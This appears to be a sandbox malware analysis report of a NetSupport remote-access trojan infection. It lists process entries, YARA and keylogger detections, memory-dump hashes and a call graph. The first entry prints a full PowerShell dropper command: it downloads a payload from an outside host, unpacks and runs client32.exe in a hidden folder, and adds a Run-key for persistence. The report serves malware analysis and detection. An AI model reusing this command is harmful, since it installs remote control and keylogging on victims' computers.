                                                                            • Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Source: 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:1
                                                                            Start time:16:29:45
                                                                            Start date:16/07/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
                                                                            Imagebase:0x7ff788560000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000002.1816720389.00000170BAECC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000002.1816720389.00000170BAEAD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000002.1816720389.00000170BAED6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000002.1816720389.00000170BABCF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:16:29:45
                                                                            Start date:16/07/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:16:29:52
                                                                            Start date:16/07/2024
                                                                            Path:C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe"
                                                                            Imagebase:0x950000
                                                                            File size:103'824 bytes
                                                                            MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.2968386737.0000000000952000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.2969282587.00000000037E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.2971125252.000000006F160000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000000.1780896953.0000000000952000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe, Author: Joe Security
                                                                            Antivirus matches:
                                                                            • Detection: 26%, ReversingLabs
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            Target ID:7
                                                                            Start time:16:30:05
                                                                            Start date:16/07/2024
                                                                            Path:C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe"
                                                                            Imagebase:0x950000
                                                                            File size:103'824 bytes
                                                                            MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.1909048492.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.1907401442.0000000000952000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.1907824908.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000000.1905398866.0000000000952000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:8
                                                                            Start time:16:30:13
                                                                            Start date:16/07/2024
                                                                            Path:C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe"
                                                                            Imagebase:0x950000
                                                                            File size:103'824 bytes
                                                                            MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000000.1986528123.0000000000952000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.1988466728.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.1988422325.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.1988422325.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.1987638721.0000000000952000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                              • Instruction Fuzzy Hash: E4214721F1EB4D0FEBA4A67C487967937C1DF98210B06057BD44EC32F2CD19AD424381
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b2a0010cac617d31eeb8b081e8ab6599bba5330f5936c0c03fd83ef55794ce81
                                                                              • Instruction ID: da356d2d973e08b1c34e7609aacbc98989e59f4dc0ee18c4d56ea3f646cc0936
                                                                              • Opcode Fuzzy Hash: b2a0010cac617d31eeb8b081e8ab6599bba5330f5936c0c03fd83ef55794ce81
                                                                              • Instruction Fuzzy Hash: 26224C34A1894D8FDF98EF1CC898AA977E1FF69301B0501A9E85ED72A1DB35EC41CB40
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b33751481380092fcb8e021a8e573f17843207d24cfac7690df5d5f7d2538656
                                                                              • Instruction ID: f4f665b8fbb91dd3a44cf3b40206167916b6c1775669f104be405a3a64c0acc4
                                                                              • Opcode Fuzzy Hash: b33751481380092fcb8e021a8e573f17843207d24cfac7690df5d5f7d2538656
                                                                              • Instruction Fuzzy Hash: 3A41F417F1F6DA6FE77292B858752A83FE1AF52210B1A00FBD0D8CB1A3D90869468341
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1885028233.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b9f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 39340d1696e07d66a969a97a7976e28fc84afa56cb2eaf3ae01f1b52e757e8e1
                                                                              • Instruction ID: e7da2b55997f94d31e8164201ead13ee3519f22f2bb65420578dd00338ac7703
                                                                              • Opcode Fuzzy Hash: 39340d1696e07d66a969a97a7976e28fc84afa56cb2eaf3ae01f1b52e757e8e1
                                                                              • Instruction Fuzzy Hash: 71F12722B1FBC91FE7A6977948656A47FE0EF52260B0A01FFD08DC72E3D918AD458341
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1885028233.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b9f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 74caac95f9076e8c60bfa1c144233e1efac3eaed07ef7b3769bc3e4ca90af7ce
                                                                              • Instruction ID: 02c256d13c662fbad4803233d89e0f50b3e21aac4425062096e5078d2ebe2aab
                                                                              • Opcode Fuzzy Hash: 74caac95f9076e8c60bfa1c144233e1efac3eaed07ef7b3769bc3e4ca90af7ce
                                                                              • Instruction Fuzzy Hash: 8BD14571B1EA8E1FEBA5EB6888655B87FE0EF55320B0900BFD05DC71F2DA18AD058341
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ec5d77f9618c2be33d022b67516084a43b0e48a2ea7bce50387e314ae37a594d
                                                                              • Instruction ID: acfc8e193b5cc06496831d1c59af3436510aa2d7f4558fae701c2020bec63107
                                                                              • Opcode Fuzzy Hash: ec5d77f9618c2be33d022b67516084a43b0e48a2ea7bce50387e314ae37a594d
                                                                              • Instruction Fuzzy Hash: A3711631F2E94C5FDB65E76888A56B877E1EF85300F0500BAD44EC76A7DE28AD428781
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2e62847ec29814c21ec8f73062ba1a7a506cbbad73b15831848ed9dcf32c5d09
                                                                              • Instruction ID: fab6be2d100a703dea8fd624d5df2bec65cc2c886426389b4b796aeb1ad6b5ca
                                                                              • Opcode Fuzzy Hash: 2e62847ec29814c21ec8f73062ba1a7a506cbbad73b15831848ed9dcf32c5d09
                                                                              • Instruction Fuzzy Hash: 7771C621F29D1E4BEBA4F7AC8825ABD63D2EF54700B514175D05EC3AE6DE28BD428380
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1885028233.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b9f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8f5750bbf342c98e23ddda25db7cacbbbbd6a4a88419963e7acb26adcaaf2e6f
                                                                              • Instruction ID: 67f496b0552f505f11221dc7a3d54f6e4845be269c8b33e1d187eac0fc6a77c4
                                                                              • Opcode Fuzzy Hash: 8f5750bbf342c98e23ddda25db7cacbbbbd6a4a88419963e7acb26adcaaf2e6f
                                                                              • Instruction Fuzzy Hash: EF613B22B1FA9B1FF7B99BA814712B56BC1DF95630B4A00BED05EC31E7ED09AD448341
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 78dd8a82f3441ba393985f2d2f41f3a1ce5b37e86a1b74f5d7d8d0f0359e8465
                                                                              • Instruction ID: a386db2e6a65b82dddfa74538446eba00fc812b307e520c0b2ee70cdd20883ad
                                                                              • Opcode Fuzzy Hash: 78dd8a82f3441ba393985f2d2f41f3a1ce5b37e86a1b74f5d7d8d0f0359e8465
                                                                              • Instruction Fuzzy Hash: 7061C621F2E90E1AEB68ABB848717BD63D2EF88354F5640B9D05ED32D7DD2DAD024341
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1885028233.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b9f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5cdb3538f764069d3cda79e1166b72103c7f0c541b573eb93b8991fb356a36d8
                                                                              • Instruction ID: e2dd301c4ac9ae78dbbb5570ef9bb2eca6678c8ea40315ccc0522213a9841bbc
                                                                              • Opcode Fuzzy Hash: 5cdb3538f764069d3cda79e1166b72103c7f0c541b573eb93b8991fb356a36d8
                                                                              • Instruction Fuzzy Hash: D8610B22F2FA8A1FE7B49A7A04B47786BD1EF64261B1A00BDD45DC72E7DD189C418341
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 78e62226d15013306876b02792758a35888e5eac17d52d1af949890262d6652f
                                                                              • Instruction ID: f70a29ea7b09665ab757958148c17e009cea5ed793bbfdbfe297c9b678525ba9
                                                                              • Opcode Fuzzy Hash: 78e62226d15013306876b02792758a35888e5eac17d52d1af949890262d6652f
                                                                              • Instruction Fuzzy Hash: D551D630B1EA495FD7A4EF6CD464A657BE1FF5931170600BAE489C72B2DA28EC81C781
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                              • Instruction ID: 1e680bccaa898293ef83bf82e7ac7364f5aebd11e1679202d106f581de6cc9d9
                                                                              • Opcode Fuzzy Hash: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                              • Instruction Fuzzy Hash: E841E73131581C8FDAE4EB5CE898E6877E1FF6C31271605E6E44ACB271DA26DC81CB40
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a590a31f9e642a49984177bb78c93959c8db463aac6a1083624c9b398f6adcb6
                                                                              • Instruction ID: c73067184f08fbd257956a9bba63014f76b13759e39711e80888050db706967b
                                                                              • Opcode Fuzzy Hash: a590a31f9e642a49984177bb78c93959c8db463aac6a1083624c9b398f6adcb6
                                                                              • Instruction Fuzzy Hash: 72418C21F2DD0E5FEBA8F6AC9065AB973D1EF58310B1544B9D04EC32A6DE29FD818740
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 96db6d56b0416967938deb00c2a90ea0964573ec213240a46b7b4ffbddf84da0
                                                                              • Instruction ID: 5d7caf61680661d2b1f5d658e6fb19e5106152e1d2f417bb5e3afbf7a0e5be2e
                                                                              • Opcode Fuzzy Hash: 96db6d56b0416967938deb00c2a90ea0964573ec213240a46b7b4ffbddf84da0
                                                                              • Instruction Fuzzy Hash: 9E41B731F2E90A1AFB68AB7848717B863C3EF99314F5640B9D45ED32E7DD2DAD418201
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1885028233.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b9f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 67fc9232014db1e847a4e92bf7939a0f25b8e29275fb6084dc3b8e68e163b0f9
                                                                              • Instruction ID: c7a4cf4cd398a20b2e881d5385131c199b6e66570da4d68355b22f37522bb887
                                                                              • Opcode Fuzzy Hash: 67fc9232014db1e847a4e92bf7939a0f25b8e29275fb6084dc3b8e68e163b0f9
                                                                              • Instruction Fuzzy Hash: E5414812F2FA8B1BF7B99BA804712786BC1DF91670B5A00BAD45DC31E7ED0DAD404301
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 62aeb82732d706e2ddea33948b853f4da629ca13d5b7b760447b8d51ce7e4035
                                                                              • Instruction ID: 2db76f8bc761b9792a2e931b44c7ddc63773675e79359884e0a3135bec775e8a
                                                                              • Opcode Fuzzy Hash: 62aeb82732d706e2ddea33948b853f4da629ca13d5b7b760447b8d51ce7e4035
                                                                              • Instruction Fuzzy Hash: 5F41A531F2E90A1AEB68AB6858717B863C3EF89314F5640B9D45ED32E7DD2DAD418201
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1885028233.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b9f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 65547209769dba76cf2a7ec1a2e6b8bb25e822b48affbdb49ec165fd879d6e85
                                                                              • Instruction ID: 52f61605de7ebe171642d324d82c1ec385b43d37545cbc63052294946e780344
                                                                              • Opcode Fuzzy Hash: 65547209769dba76cf2a7ec1a2e6b8bb25e822b48affbdb49ec165fd879d6e85
                                                                              • Instruction Fuzzy Hash: B7410862B2FA8E5FEBB4976858755B96BD0EF14360F5900BAD45DC32F2DE1C6C408340
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: eb63cc7a9763de5bbee861fd66db01def985665a3b9dd285a7e09ef78b9b2679
                                                                              • Instruction ID: d7f77eb31acf578ceadc1281f053f25a9c6ce4b47e2f163fe5fe5abd20370ef8
                                                                              • Opcode Fuzzy Hash: eb63cc7a9763de5bbee861fd66db01def985665a3b9dd285a7e09ef78b9b2679
                                                                              • Instruction Fuzzy Hash: 58312632E1E68E5FEBA4DB5894613B937E1EF98310F06017AE40DC32E2DE296D458380
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 083d318ad3ac789bf724f7391b62801cb50aecd74344d877b855133a4f87cb96
                                                                              • Instruction ID: 62f2e12ff0f9ffeaa8be978e3b1eea5f4fbbdc6e3c671657232b0770161f079c
                                                                              • Opcode Fuzzy Hash: 083d318ad3ac789bf724f7391b62801cb50aecd74344d877b855133a4f87cb96
                                                                              • Instruction Fuzzy Hash: 1A31C331F1994D5FDBA8E779C465F6577D1EF99300F0500B9D04ECB2A2DA18AD82C740
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: M_^8$M_^I$M_^J$M_^K$M_^N$M_^Y
                                                                              • API String ID: 0-1632920121

                                                                              Execution Graph

                                                                              Execution Coverage: 7.5%
                                                                              Dynamic/Decrypted Code Coverage: 0%
                                                                              Signature Coverage: 14.2%
                                                                              Total number of Nodes: 2000
                                                                              Total number of Limit Nodes: 89
53350 1116bf50 53349->53350 53354 11164c3b 53349->53354 53351 1116a147 _fgetc 43 API calls 53350->53351 53350->53354 53352 1116bf6b 53351->53352 53386 111730a4 47 API calls 4 library calls 53352->53386 53355 11171f28 53354->53355 53356 11164c43 53355->53356 53357 11171f38 53355->53357 53359 1116a147 53356->53359 53357->53356 53358 11163aa5 _free 43 API calls 53357->53358 53358->53356 53360 1116a153 53359->53360 53361 1116a168 53359->53361 53387 1116a1af 43 API calls __getptd_noexit 53360->53387 53361->53344 53363 1116a158 53363->53344 53365 11171e70 _fgetc 53364->53365 53366 11171e93 53365->53366 53367 11171e78 53365->53367 53368 11171e9f 53366->53368 53374 11171ed9 53366->53374 53413 1116a1c2 43 API calls __getptd_noexit 53367->53413 53415 1116a1c2 43 API calls __getptd_noexit 53368->53415 53370 11171e7d 53414 1116a1af 43 API calls __getptd_noexit 53370->53414 53373 11171ea4 53416 1116a1af 43 API calls __getptd_noexit 53373->53416 53388 111778c4 53374->53388 53377 11171edf 53378 11171eed 53377->53378 53379 11171ef9 53377->53379 53398 11171dc8 53378->53398 53417 1116a1af 43 API calls __getptd_noexit 53379->53417 53382 11171e85 _fgetc 53382->53346 53383 11171ef3 53418 11171f20 LeaveCriticalSection __unlock_fhandle 53383->53418 53385->53338 53386->53354 53387->53363 53389 111778d0 _fgetc 53388->53389 53390 1117792a 53389->53390 53393 1117459f __lock 43 API calls 53389->53393 53391 1117792f EnterCriticalSection 53390->53391 53392 1117794c _fgetc 53390->53392 53391->53392 53392->53377 53394 111778fc 53393->53394 53395 11177905 InitializeCriticalSectionAndSpinCount 53394->53395 53396 11177918 53394->53396 53395->53396 53419 1117795a LeaveCriticalSection _doexit 53396->53419 53420 1117785b 53398->53420 53400 11171e2e 53431 111777d5 44 API calls 2 library calls 53400->53431 53401 11171dd8 53401->53400 53403 1117785b __lseeki64_nolock 43 API calls 53401->53403 53412 11171e0c 53401->53412 53406 11171e03 53403->53406 53404 1117785b __lseeki64_nolock 43 API calls 53407 
11171e18 FindCloseChangeNotification 53404->53407 53405 11171e36 53409 1117785b __lseeki64_nolock 43 API calls 53406->53409 53407->53400 53409->53412 53412->53400 53412->53404 53413->53370 53414->53382 53415->53373 53416->53382 53417->53383 53418->53382 53419->53390 53421 11177868 53420->53421 53424 11177880 53420->53424 53422 1116a1c2 __read 43 API calls 53421->53422 53423 1117786d 53422->53423 53426 1116a1af _fgetc 43 API calls 53423->53426 53425 1116a1c2 __read 43 API calls 53424->53425 53428 111778bf 53424->53428 53427 11177891 53425->53427 53430 11177875 53426->53430 53429 1116a1af _fgetc 43 API calls 53427->53429 53428->53401 53429->53430 53430->53401 53431->53405 53433 11174898 53434 1116c675 __getptd 43 API calls 53433->53434 53435 111748b5 _LcidFromHexString 53434->53435 53436 111748c2 GetLocaleInfoA 53435->53436 53437 111748f5 53436->53437 53451 111748e9 53436->53451 53459 1116558e 64 API calls 2 library calls 53437->53459 53439 11174901 53440 1117490b GetLocaleInfoA 53439->53440 53447 1117493b _CountryEnumProc@4 53439->53447 53441 1117492a 53440->53441 53440->53451 53460 1116558e 64 API calls 2 library calls 53441->53460 53442 111749ae GetLocaleInfoA 53444 111749d1 53442->53444 53442->53451 53462 1116558e 64 API calls 2 library calls 53444->53462 53446 111749dc 53448 11174a14 53446->53448 53449 111749e4 53446->53449 53447->53442 53447->53451 53448->53451 53463 1116558e 64 API calls 2 library calls 53448->53463 53449->53451 53453 11174a02 _strlen 53449->53453 53450 11174935 53450->53447 53461 11164644 64 API calls 2 library calls 53450->53461 53453->53451 53455 11174a0f 53453->53455 53454 11174960 53454->53447 53457 11174967 _strlen 53454->53457 53455->53451 53458 11174a31 _TestDefaultLanguage 53455->53458 53457->53447 53458->53451 53459->53439 53460->53450 53461->53454 53462->53446 53463->53455 53464 11030ef3 